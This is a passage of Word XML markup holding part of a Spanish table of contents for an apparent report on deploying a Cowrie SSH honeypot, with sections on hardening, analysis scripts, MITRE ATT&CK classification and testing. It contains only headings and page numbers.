          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tecnología</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hetzner Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh 4.9.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Herramientas de Red y Seguridad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Herramientas de Desarrollo y Documentación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodología</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodología Utilizada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Planificación Temporal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Presupuesto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	33</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">README y Git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	34</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Catálogo de Técnicas MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	34</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Estrategia de Despliegue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bastionado del Servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	38</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Instalación y Configuración de Cowrie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	39</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposición del Honeypot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Script de Análisis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Clasificación Automática en MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Herramienta de Aprovisionamiento en OCI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	44</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Normalización de Saltos de Línea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	44</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pruebas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Entorno de Pruebas Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de Arranque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Incidencia: Rechazo Silencioso de Todos los Logins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataque Simulado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Validación del Analizador con Datos Reales</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	48</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba del Clasificador MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	48</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de la Herramienta de Aprovisionamiento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de la Reserva de Memoria</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	51</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
